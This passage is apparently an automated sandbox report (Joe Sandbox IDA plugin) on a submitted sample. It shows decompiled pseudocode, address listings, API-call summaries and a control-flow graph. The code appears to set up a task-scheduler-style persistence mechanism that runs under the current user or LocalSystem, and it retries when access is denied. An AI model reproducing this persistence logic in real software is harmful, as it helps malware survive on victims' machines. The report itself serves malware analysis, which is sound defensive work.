				intOrPtr* _t334;
				void* _t338;
				void* _t342;
				void* _t344;
				void* _t345;

				_t349 =  *((intOrPtr*)(__ecx + 4));
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_t334 = __ecx;
					_v8 = 0;
					_v16 = 0;
					_v20 = 0;
					_v24 = 0;
					_v12 = 0;
					_t284 = 0;
					_v28 = 0;
					E003C9090(_t349,  &_v280, 0x24);
					_t239 =  *_t334;
					_t344 = _t342 - 0x114 + 8;
					_t241 =  *((intOrPtr*)( *((intOrPtr*)( *_t239 + 0x20))))(_t239,  &_v280, 0x3e613c, 0x3e611c,  &_v8, _t329, _t333, _t283, _t338);
					if(_t241 >= 0) {
						E003C8030( &_v12);
						_t345 = _t344 + 4;
						__eflags = _v12;
						if(_v12 != 0) {
							_v28 = 0x101;
							_t284 = E003D1D90(0x202, 0);
							_t345 = _t345 + 8;
							__eflags = _t284;
							if(_t284 != 0) {
								_t292 =  *0x3e8628; // 0x622508
								 *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x138))))(_t284,  &_v28);
								_t256 = _v8;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t256 + 0x80))))(_t256, _v12);
								if(__eflags >= 0) {
									E003C9090(__eflags,  &_v280, 0x14);
									_t260 = _v8;
									_t345 = _t345 + 8;
									_t261 =  *((intOrPtr*)( *((intOrPtr*)( *_t260 + 0x50))))(_t260,  &_v280);
									__eflags = _t261;
									if(_t261 >= 0) {
										_t262 = _v8;
										_t264 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0xc))))(_t262,  &_v32,  &_v20);
										__eflags = _t264;
										if(_t264 >= 0) {
											memset( &_v80, 0, 0x30);
											_v80 = 0x30;
											_v76 = 0x7e1;
											_v72 = 1;
											_v44 = 1;
											_t268 = _v20;
											_t345 = _t345 + 0xc;
											_v74 = 1;
											_v60 = 0x5a0;
											_v56 = 1;
											_v48 = 1;
											_t270 =  *((intOrPtr*)( *((intOrPtr*)( *_t268 + 0xc))))(_t268,  &_v80);
											__eflags = _t270;
											if(_t270 >= 0) {
												_t271 = _v8;
												_t272 =  *((intOrPtr*)( *((intOrPtr*)( *_t271 + 0x78))))(_t271, 0x3e32c0, 0);
												__eflags = _t272 - 0x80070005;
												if(_t272 == 0x80070005) {
													_t281 = _v8;
													_t272 =  *((intOrPtr*)( *((intOrPtr*)( *_t281 + 0x78))))(_t281, _t284, 0);
												}
												__eflags = _t272;
												if(_t272 >= 0) {
													_t273 = _v8;
													_t275 =  *((intOrPtr*)( *((intOrPtr*)( *_t273))))(_t273, 0x3e60a0,  &_v16);
													__eflags = _t275;
													if(_t275 >= 0) {
														_t276 = _v16;
														_t277 =  *((intOrPtr*)( *((intOrPtr*)( *_t276 + 0x18))))(_t276, 0, 1);
														__eflags = _t277 - 0x80070005;
														if(_t277 == 0x80070005) {
															_t278 = _v8;
															 *((intOrPtr*)( *((intOrPtr*)( *_t278 + 0x78))))(_t278, _t284, 0);
															_t280 = _v16;
															_t277 =  *((intOrPtr*)( *((intOrPtr*)( *_t280 + 0x18))))(_t280, 0, 1);
														}
														__eflags = _t277;
														if(_t277 >= 0) {
															_v24 = 1;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						_t243 = _v20;
						__eflags = _t243;
						if(_t243 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 8))))(_t243);
						}
						_t244 = _v8;
						__eflags = _t244;
						if(_t244 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t244 + 8))))(_t244);
						}
						_t245 = _v16;
						__eflags = _t245;
						if(_t245 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t245 + 8))))(_t245);
						}
						_t246 = _v12;
						__eflags = _t246;
						if(_t246 != 0) {
							E003CBB40(_t246);
							_t345 = _t345 + 4;
						}
						__eflags = _t284;
						if(_t284 != 0) {
							E003CBB40(_t284);
						}
						return _v24;
					} else {
						return 0 | _t241 == 0x80070050;
					}
				} else {
					__ebp = __esp;
					__esp = __esp - 0x214;
					__eax = 0;
					_v20 = 0;
					_v48 = 0;
					_v34 = 0;
					_v30 = 0;
					_v26 = 0;
					__esi = _v28;
					_v52 = 0;
					_v22 = __ax;
					__edi = _v24;
					_v8 = __ecx;
					__ebx =  *__ecx;
					_v16 = 0;
					__esp = __esp - 0x10;
					__eax = __esp;
					__edx = 0;
					_v36 = __dx;
					__ecx = _v36;
					__edx = _v32;
					 *__eax = __ecx;
					 *((intOrPtr*)(__eax + 4)) = __edx;
					 *((intOrPtr*)(__eax + 8)) = __esi;
					 *((intOrPtr*)(__eax + 0xc)) = __edi;
					__esp = __esp - 0x10;
					__eax = __esp;
					 *__eax = __ecx;
					 *((intOrPtr*)(__eax + 4)) = __edx;
					 *((intOrPtr*)(__eax + 8)) = __esi;
					 *((intOrPtr*)(__eax + 0xc)) = __edi;
					__esp = __esp - 0x10;
					__eax = __esp;
					 *__eax = __ecx;
					 *((intOrPtr*)(__eax + 4)) = __edx;
					 *((intOrPtr*)(__eax + 8)) = __esi;
					 *((intOrPtr*)(__eax + 0xc)) = __edi;
					__esp = __esp - 0x10;
					__eax = __esp;
					 *__eax = __ecx;
					 *((intOrPtr*)(__eax + 4)) = __edx;
					 *((intOrPtr*)(__eax + 8)) = __esi;
					__esi = _v8;
					 *((intOrPtr*)(__eax + 0xc)) = __edi;
					_t91 = __esi + 4; // 0xe8fc4d8d
					__eax =  *_t91;
					__eax =  *((intOrPtr*)(__ebx + 0x28));
					_v44 = 1;
					__eax =  *( *((intOrPtr*)(__ebx + 0x28)))( *_t91, __edi, __esi, __ebx, __ebp); // executed
					__eflags = __eax;
					if(__eax >= 0) {
						_t94 = __esi + 4; // 0xe8fc4d8d
						__eax =  *_t94;
						__ecx =  *__eax;
						__edx =  &_v20;
						__eax =  *((intOrPtr*)(__ecx + 0x1c));
						__eax =  *( *((intOrPtr*)(__ecx + 0x1c)))(__eax, 0,  &_v20);
						__eflags = __eax;
						if(__eax >= 0) {
							__ecx =  &_v52;
							__eax = E003C8030( &_v52);
							__edx = _v52;
							_v20 = E003C32C0(_v20, _v52);
							__eflags =  *0x3e8580;
							if(__eflags == 0) {
								__edx =  &_v16;
								__eax = E003C5BD0( &_v16, 1); // executed
								__eflags = __eax;
								if(__eflags != 0) {
									 &_v536 = E003C9090(__eflags,  &_v536, 0x15);
									__ecx =  &_v336;
									__eax = E003C9090(__eflags,  &_v336, 0x24);
									__edi = __imp__#8;
									__edx =  &_v104;
									 *__edi( &_v104) = _v96;
									__ecx = _v92;
									__esi = _v104;
									__ebx = _v100;
									__edx =  &_v88;
									_v112 = _v96;
									_v108 = _v92;
									__eax =  *__edi( &_v88);
									__ecx = _v84;
									__eax = _v88;
									__edx = _v80;
									_v32 = _v84;
									__ecx =  &_v536;
									_v36 = _v88;
									__eax = _v76;
									__ecx =  &_v136;
									_v28 = _v80;
									_v24 = _v76;
									__eax = E003E0290( &_v136,  &_v536);
									__ecx =  *((intOrPtr*)(__eax + 4));
									__edx =  *__eax;
									_v68 =  *((intOrPtr*)(__eax + 4));
									__ecx = _v16;
									_v72 =  *__eax;
									__edx =  *((intOrPtr*)(__eax + 8));
									__eax =  *((intOrPtr*)(__eax + 0xc));
									__ecx =  &_v40;
									_v64 = __edx;
									_v60 = __eax;
									__eax = E003C13C0(__eax,  &_v40, __edi, _v16);
									__eax =  *__eax;
									__eflags = __eax;
									if(__eax == 0) {
										_v12 = 0;
									} else {
										__edx =  *__eax;
										_v12 =  *__eax;
									}
									__eax =  &_v336;
									__ecx =  &_v56;
									__eax = E003C13C0( &_v336,  &_v56, __edi,  &_v336);
									__eax =  *__eax;
									__eflags = __eax;
									if(__eax == 0) {
										_v8 = 0;
									} else {
										__ecx =  *__eax;
										_v8 =  *__eax;
									}
									__eax =  &_v48;
									__esp = __esp - 0x10;
									__eax = __esp;
									 *__eax = __esi;
									__esi = _v112;
									 *((intOrPtr*)(__eax + 4)) = __ebx;
									 *((intOrPtr*)(__eax + 8)) = _v112;
									__esi = _v108;
									 *((intOrPtr*)(__eax + 0xc)) = _v108;
									__esi = _v36;
									__esp = __esp - 0x10;
									__eax = __esp;
									 *__eax = _v36;
									__esi = _v32;
									 *((intOrPtr*)(__eax + 4)) = _v32;
									__esi = _v28;
									__ecx = _v20;
									 *((intOrPtr*)(__eax + 8)) = _v28;
									__esi = _v24;
									__edx =  *__ecx;
									 *((intOrPtr*)(__eax + 0xc)) = _v24;
									__esi = _v72;
									__esp = __esp - 0x10;
									__eax = __esp;
									 *__eax = _v72;
									__esi = _v68;
									 *((intOrPtr*)(__eax + 4)) = _v68;
									__esi = _v64;
									 *((intOrPtr*)(__eax + 8)) = _v64;
									__esi = _v60;
									 *((intOrPtr*)(__eax + 0xc)) = _v60;
									__eax = _v12;
									__eax = _v8;
									__ecx =  *((intOrPtr*)(__edx + 0x40));
									__eax =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0x40))))(__ecx, _v8, _v12, 6, 5,  &_v48);
									__ecx =  &_v56;
									__ebx = _v8;
									__eax = E003C7CF0( &_v56);
									__ecx =  &_v40;
									__eax = E003C7CF0( &_v40);
									__esi = __imp__#9;
									__edx =  &_v136;
									 *__esi( &_v136) =  &_v88;
									__eax =  *__esi( &_v88);
									__ecx =  &_v104;
									__eax =  *__esi( &_v104);
									__eflags = __ebx;
									if(__ebx >= 0) {
										__eax = E003C6D30(); // executed
										__eflags = __eax;
										if(__eax == 0) {
											_v44 = __eax;
										}
									} else {
										__eflags = __ebx - 0x80070005;
										if(__ebx == 0x80070005) {
											__edx =  &_v16;
											__eflags = E003C5BD0( &_v16, 0);
											if(__eflags != 0) {
												 &_v336 = E003C9090(__eflags,  &_v336, 0x24);
												__ecx =  &_v120;
												__eax =  *__edi( &_v120);
												__edx = _v116;
												__eax = _v112;
												__ecx = _v108;
												__ebx = _v120;
												_v100 = _v116;
												__edx =  &_v136;
												_v96 = _v112;
												_v92 = _v108;
												__eax =  *__edi( &_v136);
												__ecx = _v132;
												__eax = _v136;
												__edx = _v128;
												_v68 = _v132;
												_v72 = _v136;
												__eax = _v124;
												__ecx =  &_v36;
												_v64 = _v128;
												_v60 = _v124;
												__eax =  *__edi( &_v36);
												__edx = _v32;
												__ecx = _v24;
												__eax = _v28;
												__edi = _v36;
												_v84 = _v32;
												__edx = _v16;
												_v76 = _v24;
												__ecx =  &_v56;
												_v80 = __eax;
												__eax = E003C13C0(__eax,  &_v56, __edi, _v16);
												__eax =  *__eax;
												__eflags = __eax;
												if(__eax == 0) {
													_v8 = 0;
												} else {
													__eax =  *__eax;
													_v8 = __eax;
												}
												__ecx =  &_v336;
												__ecx =  &_v40;
												__eax = E003C13C0(__eax,  &_v40, __edi,  &_v336);
												__eax =  *__eax;
												__eflags = __eax;
												if(__eax == 0) {
													_v12 = 0;
												} else {
													__edx =  *__eax;
													_v12 =  *__eax;
												}
												__eax =  &_v48;
												__esp = __esp - 0x10;
												__eax = __esp;
												 *__eax = __ebx;
												__ebx = _v100;
												 *((intOrPtr*)(__eax + 4)) = _v100;
												__ebx = _v96;
												 *((intOrPtr*)(__eax + 8)) = _v96;
												__ebx = _v92;
												 *((intOrPtr*)(__eax + 0xc)) = _v92;
												__ebx = _v72;
												__esp = __esp - 0x10;
												__eax = __esp;
												 *__eax = _v72;
												__ebx = _v68;
												__ecx = _v20;
												 *((intOrPtr*)(__eax + 4)) = _v68;
												__ebx = _v64;
												__edx =  *__ecx;
												 *((intOrPtr*)(__eax + 8)) = _v64;
												__ebx = _v60;
												 *((intOrPtr*)(__eax + 0xc)) = _v60;
												__esp = __esp - 0x10;
												__eax = __esp;
												 *__eax = __edi;
												__edi = _v84;
												 *((intOrPtr*)(__eax + 4)) = _v84;
												__edi = _v80;
												 *((intOrPtr*)(__eax + 8)) = _v80;
												__edi = _v76;
												 *((intOrPtr*)(__eax + 0xc)) = _v76;
												__eax = _v8;
												__eax = _v12;
												__ecx =  *((intOrPtr*)(__edx + 0x40));
												__eax =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0x40))))(__ecx, _v12, _v8, 6, 3,  &_v48);
												__ecx =  &_v40;
												__eax = E003C7CF0( &_v40);
												__ecx =  &_v56;
												__eax = E003C7CF0( &_v56);
												__edx =  &_v36;
												 *__esi( &_v36) =  &_v136;
												__eax =  *__esi( &_v136);
												__ecx =  &_v120;
												__eax =  *__esi( &_v120);
											}
										}
									}
								}
							} else {
								__ecx = _v52;
								__ecx = __esi;
								__eax = E003E0580(__esi, __eflags, _v52);
							}
						}
					}
					__eax = _v48;
					__eflags = __eax;
					if(__eax != 0) {
						__edx =  *__eax;
						 *((intOrPtr*)(__edx + 8)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))))(__eax);
					}
					__eax = _v20;
					__eflags = __eax;
					if(__eax != 0) {
						__ecx =  *__eax;
						__edx =  *((intOrPtr*)(__ecx + 8));
						__eax =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 8))))(__eax);
					}
					__eax = _v16;
					__eflags = __eax;
					if(__eax != 0) {
						__eax = E003CBB40(__eax);
					}
					__eax = _v44;
					_pop(__edi);
					_pop(__esi);
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return _v44;
				}
			}
















































































    0x003c3d50
    0x003c3d54
    0x003c1457
    0x003c1459
    0x003c145c
    0x003c145f
    0x003c1462
    0x003c1465
    0x003c1468
    0x003c146a
    0x003c146d
    0x003c1472
    0x003c1476
    0x003c1492
    0x003c1496
    0x003c14af
    0x003c14b4
    0x003c14b7
    0x003c14ba
    0x003c14c6
    0x003c14d2
    0x003c14d4
    0x003c14d7
    0x003c14d9
    0x003c14df
    0x003c14f0
    0x003c14f2
    0x003c1504
    0x003c1506
    0x003c1515
    0x003c151a
    0x003c1522
    0x003c152d
    0x003c152f
    0x003c1531
    0x003c1537
    0x003c1548
    0x003c154a
    0x003c154c
    0x003c1559
    0x003c1568
    0x003c1571
    0x003c1577
    0x003c157d
    0x003c1581
    0x003c1584
    0x003c158c
    0x003c1590
    0x003c1597
    0x003c159a
    0x003c15a4
    0x003c15a6
    0x003c15a8
    0x003c15aa
    0x003c15b9
    0x003c15bb
    0x003c15c0
    0x003c15c2
    0x003c15cd
    0x003c15cd
    0x003c15cf
    0x003c15d1
    0x003c15d3
    0x003c15e4
    0x003c15e6
    0x003c15e8
    0x003c15ea
    0x003c15f5
    0x003c15f7
    0x003c15fc
    0x003c15fe
    0x003c1609
    0x003c160b
    0x003c1616
    0x003c1616
    0x003c1618
    0x003c161a
    0x003c161c
    0x003c161c
    0x003c161a
    0x003c15e8
    0x003c15d1
    0x003c15a8
    0x003c154c
    0x003c1531
    0x003c1506
    0x003c14d9
    0x003c161f
    0x003c1622
    0x003c1624
    0x003c162c
    0x003c162c
    0x003c162e
    0x003c1631
    0x003c1633
    0x003c163b
    0x003c163b
    0x003c163d
    0x003c1640
    0x003c1642
    0x003c164a
    0x003c164a
    0x003c164c
    0x003c164f
    0x003c1651
    0x003c1654
    0x003c1659
    0x003c1659
    0x003c165c
    0x003c165e
    0x003c1661
    0x003c1666
    0x003c1672
    0x003c1498
    0x003c14aa
    0x003c14aa
    0x003c3d56
    0x003c61e1
    0x003c61e3
    0x003c61e9
    0x003c61ee
    0x003c61f1
    0x003c61f4
    0x003c61f7
    0x003c61fa
    0x003c61fd
    0x003c6200
    0x003c6203
    0x003c6207
    0x003c620a
    0x003c6210
    0x003c6212
    0x003c6215
    0x003c6218
    0x003c621a
    0x003c621c
    0x003c6220
    0x003c6223
    0x003c6226
    0x003c6228
    0x003c622b
    0x003c622e
    0x003c6231
    0x003c6234
    0x003c6236
    0x003c6238
    0x003c623b
    0x003c623e
    0x003c6241
    0x003c6244
    0x003c6246
    0x003c6248
    0x003c624b
    0x003c624e
    0x003c6251
    0x003c6254
    0x003c6256
    0x003c6258
    0x003c625b
    0x003c625e
    0x003c6261
    0x003c6264
    0x003c6264
    0x003c6268
    0x003c626b
    0x003c6272
    0x003c6274
    0x003c6276
    0x003c627c
    0x003c627c
    0x003c627f
    0x003c6281
    0x003c6288
    0x003c628b
    0x003c628d
    0x003c628f
    0x003c6295
    0x003c6299
    0x003c629e
    0x003c62a6
    0x003c62ae
    0x003c62b5
    0x003c62c7
    0x003c62cd
    0x003c62d5
    0x003c62d7
    0x003c62e6
    0x003c62eb
    0x003c62f4
    0x003c62f9
    0x003c6302
    0x003c6308
    0x003c630b
    0x003c630e
    0x003c6311
    0x003c6314
    0x003c6318
    0x003c631b
    0x003c631e
    0x003c6320
    0x003c6323
    0x003c6326
    0x003c6329
    0x003c632c
    0x003c6332
    0x003c6335
    0x003c6339
    0x003c633f
    0x003c6342
    0x003c6345
    0x003c634a
    0x003c634d
    0x003c634f
    0x003c6352
    0x003c6355
    0x003c6358
    0x003c635b
    0x003c635f
    0x003c6362
    0x003c6365
    0x003c6368
    0x003c636d
    0x003c636f
    0x003c6371
    0x003c637a
    0x003c6373
    0x003c6373
    0x003c6375
    0x003c6375
    0x003c6381
    0x003c6388
    0x003c638b
    0x003c6390
    0x003c6392
    0x003c6394
    0x003c639d
    0x003c6396
    0x003c6396
    0x003c6398
    0x003c6398
    0x003c63a4
    0x003c63a8
    0x003c63ab
    0x003c63ad
    0x003c63af
    0x003c63b2
    0x003c63b5
    0x003c63b8
    0x003c63bb
    0x003c63be
    0x003c63c3
    0x003c63c6
    0x003c63c8
    0x003c63ca
    0x003c63cd
    0x003c63d0
    0x003c63d3
    0x003c63d6
    0x003c63d9
    0x003c63dc
    0x003c63de
    0x003c63e1
    0x003c63e4
    0x003c63e7
    0x003c63e9
    0x003c63eb
    0x003c63ee
    0x003c63f1
    0x003c63f4
    0x003c63f7
    0x003c63fa
    0x003c63fd
    0x003c6403
    0x003c6408
    0x003c640b
    0x003c640d
    0x003c6410
    0x003c6412
    0x003c6417
    0x003c641a
    0x003c641f
    0x003c6425
    0x003c642e
    0x003c6432
    0x003c6434
    0x003c6438
    0x003c643a
    0x003c643c
    0x003c65a2
    0x003c65a7
    0x003c65a9
    0x003c65ab
    0x003c65ab
    0x003c6442
    0x003c6442
    0x003c6448
    0x003c644e
    0x003c645c
    0x003c645e
    0x003c646d
    0x003c6475
    0x003c6479
    0x003c647b
    0x003c647e
    0x003c6481
    0x003c6484
    0x003c6487
    0x003c648a
    0x003c6491
    0x003c6494
    0x003c6497
    0x003c6499
    0x003c649c
    0x003c64a2
    0x003c64a5
    0x003c64a8
    0x003c64ab
    0x003c64ae
    0x003c64b2
    0x003c64b5
    0x003c64b8
    0x003c64ba
    0x003c64bd
    0x003c64c0
    0x003c64c3
    0x003c64c6
    0x003c64c9
    0x003c64cc
    0x003c64d0
    0x003c64d3
    0x003c64d6
    0x003c64db
    0x003c64dd
    0x003c64df
    0x003c64e8
    0x003c64e1
    0x003c64e1
    0x003c64e3
    0x003c64e3
    0x003c64ef
    0x003c64f6
    0x003c64f9
    0x003c64fe
    0x003c6500
    0x003c6502
    0x003c650b
    0x003c6504
    0x003c6504
    0x003c6506
    0x003c6506
    0x003c6512
    0x003c6516
    0x003c6519
    0x003c651b
    0x003c651d
    0x003c6520
    0x003c6523
    0x003c6526
    0x003c6529
    0x003c652c
    0x003c652f
    0x003c6534
    0x003c6537
    0x003c6539
    0x003c653b
    0x003c653e
    0x003c6541
    0x003c6544
    0x003c6547
    0x003c6549
    0x003c654c
    0x003c654f
    0x003c6552
    0x003c6555
    0x003c6557
    0x003c6559
    0x003c655c
    0x003c655f
    0x003c6562
    0x003c6565
    0x003c6568
    0x003c656b
    0x003c6571
    0x003c6576
    0x003c6579
    0x003c657b
    0x003c657e
    0x003c6583
    0x003c6586
    0x003c658b
    0x003c6591
    0x003c6598
    0x003c659a
    0x003c659e
    0x003c659e
    0x003c645e
    0x003c6448
    0x003c643c
    0x003c62b7
    0x003c62b7
    0x003c62bb
    0x003c62bd
    0x003c62bd
    0x003c62b5
    0x003c628f
    0x003c65ae
    0x003c65b1
    0x003c65b3
    0x003c65b5
    0x003c65bb
    0x003c65bb
    0x003c65bd
    0x003c65c0
    0x003c65c2
    0x003c65c4
    0x003c65c6
    0x003c65ca
    0x003c65ca
    0x003c65cc
    0x003c65cf
    0x003c65d1
    0x003c65d4
    0x003c65d9
    0x003c65dc
    0x003c65df
    0x003c65e0
    0x003c65e1
    0x003c65e2
    0x003c65e4
    0x003c65e5
    0x003c65e5

    APIs
      • Part of subcall function 003C5BD0: LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 003C5C5B
      • Part of subcall function 003C5BD0: memcpy.MSVCRT ref: 003C5D01
      • Part of subcall function 003C5BD0: memcpy.MSVCRT ref: 003C5D26
      • Part of subcall function 003C5BD0: _time64.MSVCRT ref: 003C5DCC
      • Part of subcall function 003C5BD0: _localtime64.MSVCRT ref: 003C5DDD
      • Part of subcall function 003C5BD0: wcsftime.MSVCRT ref: 003C5E07
    • VariantInit.OLEAUT32(?), ref: 003C6306
    • VariantInit.OLEAUT32(?), ref: 003C631E
      • Part of subcall function 003E0290: SysAllocString.OLEAUT32(Jc<), ref: 003E02A3
      • Part of subcall function 003C13C0: ??2@YAPAXI@Z.MSVCRT ref: 003C13C9
      • Part of subcall function 003C13C0: SysAllocString.OLEAUT32(75CF3F3F), ref: 003C13EA
      • Part of subcall function 003C7CF0: InterlockedDecrement.KERNEL32(?), ref: 003C7CFE
      • Part of subcall function 003C7CF0: SysFreeString.OLEAUT32(00000000), ref: 003C7D13
      • Part of subcall function 003C7CF0: ??_V@YAXPAX@Z.MSVCRT ref: 003C7D21
      • Part of subcall function 003C7CF0: ??3@YAXPAX@Z.MSVCRT ref: 003C7D2A
    • VariantClear.OLEAUT32(?), ref: 003C642C
    • VariantClear.OLEAUT32(?), ref: 003C6432
    • VariantClear.OLEAUT32(?), ref: 003C6438
    • VariantInit.OLEAUT32(?), ref: 003C6479
    • VariantInit.OLEAUT32(?), ref: 003C6497
    • VariantInit.OLEAUT32(?), ref: 003C64B8
    • VariantClear.OLEAUT32(?), ref: 003C658F
    • VariantClear.OLEAUT32(?), ref: 003C6598
    • VariantClear.OLEAUT32(?), ref: 003C659E
      • Part of subcall function 003C6D30: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 003C6D8D
      • Part of subcall function 003E0580: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000001,?,?,80000001,?,003C62C2,?,?,?,?,003CFD54), ref: 003E05FF
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003C32C0: VariantClear.OLEAUT32(?), ref: 003C3352
      • Part of subcall function 003C32C0: SysFreeString.OLEAUT32(003C62AB), ref: 003C337C
      • Part of subcall function 003C32C0: SysFreeString.OLEAUT32(?), ref: 003C33F6
      • Part of subcall function 003C32C0: VariantClear.OLEAUT32(?), ref: 003C3495
      • Part of subcall function 003C32C0: SysFreeString.OLEAUT32(?), ref: 003C34BB
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C5BD0, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 313

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 121 3c5bd0-3c5c05 122 3c5c68-3c5c8c 121->122 123 3c5c07-3c5c2a 121->123 127 3c5ef2-3c5ef7 122->127 134 3c5c92-3c5cb5 122->134 126 3c5c30-3c5c3f 123->126 123->127 128 3c5c42-3c5c5f LookupAccountSidW 126->128 130 3c5ef9-3c5eff call 3cbb40 127->130 131 3c5f02-3c5f07 127->131 132 3c5cd5-3c5cda 128->132 133 3c5c61-3c5c67 128->133 130->131 136 3c5f09-3c5f0f 131->136 137 3c5f17-3c5f1c 131->137 139 3c5cdc-3c5ce1 132->139 140 3c5d37-3c5d3a 132->140 134->127 148 3c5cbb-3c5cd0 134->148 136->137 141 3c5f2d-3c5f35 137->141 142 3c5f1e-3c5f25 137->142 139->140 146 3c5ce3-3c5d33 call 3d1d90 memcpy * 2 139->146 143 3c5d3c-3c5d3e 140->143 144 3c5d40 140->144 142->141 147 3c5d42-3c5d79 call 3c1c70 call 3d1d90 call 3c9090 * 2 143->147 144->147 146->140 159 3c5daf-3c5df2 call 3c9090 * 2 _time64 _localtime64 call 3c9090 147->159 160 3c5d7b-3c5d91 call 3c9090 147->160 148->128 172 3c5df7-3c5e1e wcsftime 159->172 166 3c5da4-3c5dac call 3c9090 160->166 167 3c5d93-3c5da2 160->167 166->159 167->166 167->167 173 3c5e34-3c5e4d call 3c9090 172->173 174 3c5e20 172->174 178 3c5e4f 173->178 179 3c5e61-3c5e65 173->179 175 3c5e23-3c5e32 174->175 175->173 175->175 180 3c5e50-3c5e5f 178->180 181 3c5e9f-3c5ebf call 3c9090 call 3c8030 179->181 182 3c5e67-3c5e7d call 3c9090 179->182 180->179 180->180 194 3c5ec1-3c5ed0 181->194 195 3c5ed2-3c5ef0 call 3c9090 call 3cbb40 181->195 187 3c5e7f 182->187 188 3c5e91-3c5e9c call 3c9090 182->188 190 3c5e80-3c5e8f 187->190 188->181 190->188 190->190 194->194 194->195 195->127
    C-Code - Quality: 69%
    			E003C5BD0(intOrPtr* _a4, signed int _a8) {
				long _v8;
				signed int _v12;
				short _v16;
				char _v20;
				void* _v24;
				signed short* _v28;
				char _v32;
				signed short* _v36;
				char _v44;
				tm* _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				void* _v120;
				void* _v196;
				void _v708;
				void _v1220;
				long _v1732;
				intOrPtr _t98;
				signed int _t99;
				signed short* _t100;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t106;
				signed int _t111;
				void* _t113;
				int _t114;
				intOrPtr _t116;
				signed int _t117;
				signed int _t120;
				tm* _t121;
				signed short _t125;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				void* _t154;
				intOrPtr _t155;
				long _t162;
				signed short* _t165;
				signed short* _t166;
				void* _t168;
				void* _t169;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t190;
				WCHAR* _t192;
				wchar_t* _t193;
				signed short* _t194;
				void* _t195;
				intOrPtr _t196;
				void* _t197;
				void* _t198;
				void* _t199;
				signed int* _t200;
				signed int* _t201;
				signed int* _t202;
				signed int* _t203;
				signed int* _t204;
				short* _t205;
				void* _t206;
				void* _t207;
				void* _t208;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;

				_t192 = 0;
				_t195 = 0;
				_t154 = 0;
				_v32 = 0;
				_v60 = 0;
				_v20 = 0;
				_v16 = 0x500;
				_v24 = 0;
				_v28 = 0;
				_v8 = 0x200;
				_v12 = 0x200;
				if(_a8 == 0) {
					_t155 =  *0x3e8628; // 0x622508
					_t98 =  *0x3e8628; // 0x622508
					_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x150))))( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x100))))(8,  &_v32));
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					} else {
						_t179 =  *0x3e8628; // 0x622508
						_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 0x13c))))(_v32, 1,  &_v196, 0x4c,  &_v60);
						__eflags = _t111;
						if(_t111 == 0) {
							goto L32;
						} else {
							_push( &_v52);
							_push( &_v12);
							_push( &_v708);
							_t113 = _v196;
							goto L3;
						}
					}
				} else {
					_t190 =  *0x3e8628; // 0x622508
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x12);
					_push(1);
					_push( &_v20);
					if( *((intOrPtr*)( *((intOrPtr*)(_t190 + 0x158))))() == 0) {
						L32:
						_t100 = _v28;
						__eflags = _t100 - _t192;
						if(_t100 != _t192) {
							E003CBB40(_t100);
						}
						_t101 = _v24;
						__eflags = _t101 - _t192;
						if(_t101 != _t192) {
							_t106 =  *0x3e8628; // 0x622508
							 *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x154))))(_t101);
						}
						_t102 = _v32;
						__eflags = _t102 - _t192;
						if(_t102 != _t192) {
							_t177 =  *0x3e8628; // 0x622508
							 *((intOrPtr*)( *((intOrPtr*)(_t177 + 0xf8))))(_t102);
						}
						return _t195;
					} else {
						_push( &_v52);
						_push( &_v12);
						_push( &_v708);
						_t113 = _v24;
						L3:
						_t114 = LookupAccountSidW(_t192, _t113,  &_v1220,  &_v8, ??, ??, ??); // executed
						if(_t114 != 0) {
							_t162 = _v8;
							__eflags = _t162 - _t192;
							if(_t162 > _t192) {
								_t141 = _v12;
								__eflags = _t141 - _t192;
								if(_t141 > _t192) {
									_t154 = E003D1D90(_t141 + _t162 + _t141 + _t162 + 4, _t192);
									memcpy(_t154,  &_v708, _v12 + _v12);
									_t205 = _t154 + _v12 * 2;
									 *_t205 = 0x5c;
									_t206 = _t205 + 2;
									memcpy(_t206,  &_v1220, _v8 + _v8);
									_t208 = _t208 + 0x20;
									__eflags = 0;
									 *((short*)(_t206 + _v8 * 2)) = 0;
								}
							}
							__eflags = _a8 - _t192;
							if(__eflags == 0) {
								_push(0x1e);
							} else {
								_push(0x1d);
							}
							_v36 = E003C1C70(__eflags);
